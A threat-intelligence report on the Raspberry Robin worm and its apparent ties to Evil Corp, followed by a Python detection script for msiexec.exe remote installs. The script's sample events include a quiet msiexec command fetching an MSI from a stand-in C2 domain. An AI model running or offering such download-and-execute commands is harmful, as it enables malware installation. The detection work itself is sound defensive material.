IBM Security Managed Detection and Response (MDR) observations coupled with IBM Security X-Force malware research shed additional light on the mysterious objectives of the operators behind the Raspberry Robin worm. Based on a comparative analysis between a downloaded Raspberry Robin DLL and a Dridex malware loader, the results show that they are similar in structure and functionality. Thus, IBM Security research draws another link between the Raspberry Robin infections and the Russia-based cybercriminal group ‘Evil Corp,’ which is the same group behind the Dridex malware, suggesting that Evil Corp is likely using Raspberry Robin infrastructure to carry out its attacks.

When Raspberry Robin infection attempts were first observed impacting a few IBM Security MDR customers in mid-May 2022, the enigmatic worm activity began to quickly spread within a client’s network from users sharing USB devices. The infections spiked in early June, and by early August spikes of Raspberry Robin infection attempts were observed in 17% of worldwide MDR clients in the oil and gas, manufacturing, and transportation industries. This number is significant, as historically less than 1% of MDR clients have seen the same strain of malware.

The ultimate objective of Raspberry Robin had been unknown. Microsoft researchers observed millions of Raspberry Robin infections, but no evidence of post-infection exploits had been seen in the wild until July 26, 2022, when Microsoft disclosed that they had uncovered existing Raspberry Robin infections delivering FAKEUPDATES malware (aka SocGholish). The disclosure by the Microsoft threat researchers revealed that the “… DEV-0206-associated FAKEUPDATES activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior.” This statement indicates a possible relationship between Raspberry Robin and DEV-0243, which the cyber intelligence community tracks as “Evil Corp”.

The relationship between the threat actor behind FAKEUPDATES and Evil Corp is not new. Evil Corp had been leveraging FAKEUPDATES since at least April 2018 as the initial infection vector for the info-stealing Dridex malware that later resulted in deployment of DOPPLEPAYMER ransomware. The US Treasury sanctioned Evil Corp in 2019, but the group had already begun deploying custom ransomware-as-a-service (RaaS) payloads, rebranding them as WastedLocker, before shifting to the well-known RaaS LockBit ransomware. Using RaaS allows Evil Corp to blend in with other affiliates, which hinders attribution and ultimately lets the group skirt around sanctions.

Raspberry Robin, also known as the QNAP worm, is typically delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file. … LNK file, it spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility, to download and execute an MSI installer from a command and control (C2) domain.
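As an added illustration (not code from the IBM report), the following Python flags process-creation events in which msiexec.exe is asked to install a package from a remote source, the behaviour the Raspberry Robin LNK-to-msiexec chain described above relies on. The events, the field names and the `.invalid` domain are constructed sample data, not real telemetry.

```python
import re
from typing import Dict, List, Optional

# Constructed sample process-creation events (not real telemetry), modelled on
# the chain described above: a shortcut opened from removable media spawns
# msiexec.exe, which fetches and runs an MSI installer from a remote domain.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://example-c2.invalid/pkg.msi"},   # remote, quiet install
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\alice\Downloads\tool.msi"},     # local package, benign
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "MSIEXEC.EXE -Q -I https://EXAMPLE-C2.invalid:8080/x"},  # case/dash variants
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /V"},                                     # service instance, benign
]

# A package source is "remote" if it is an http(s) URL or a UNC path.
REMOTE_RE = re.compile(r"^(?:https?://|\\\\)", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def remote_sources(cmdline: str) -> List[str]:
    """Tokens of a command line that name a remote package source."""
    tokens = [t.strip("\"'") for t in cmdline.split()]
    return [t for t in tokens if REMOTE_RE.match(t)]


def analyze_event(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for msiexec.exe installing from a remote source, else None."""
    if basename(event["image"]) != "msiexec.exe":
        return None
    sources = remote_sources(event["cmdline"])
    if not sources:
        return None
    switches = [t.strip("\"'").lower() for t in event["cmdline"].split() if t[:1] in "/-"]
    quiet = any(s[1:2] == "q" for s in switches)                # /q, /qn, /quiet, -q ...
    install = any(s[1:] in ("i", "package") for s in switches)  # /i or /package
    return {"parent": basename(event["parent"]), "source": sources[0],
            "quiet": quiet, "install": install,
            "severity": "high" if quiet and install else "medium"}


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Apply analyze_event to every event and keep the findings."""
    return [f for f in map(analyze_event, events) if f is not None]
```

Parent-process and device context (an explorer.exe parent shortly after a removable-media mount) is what turns this from a hunting query into an alert; that correlation is left to the SIEM or EDR running it.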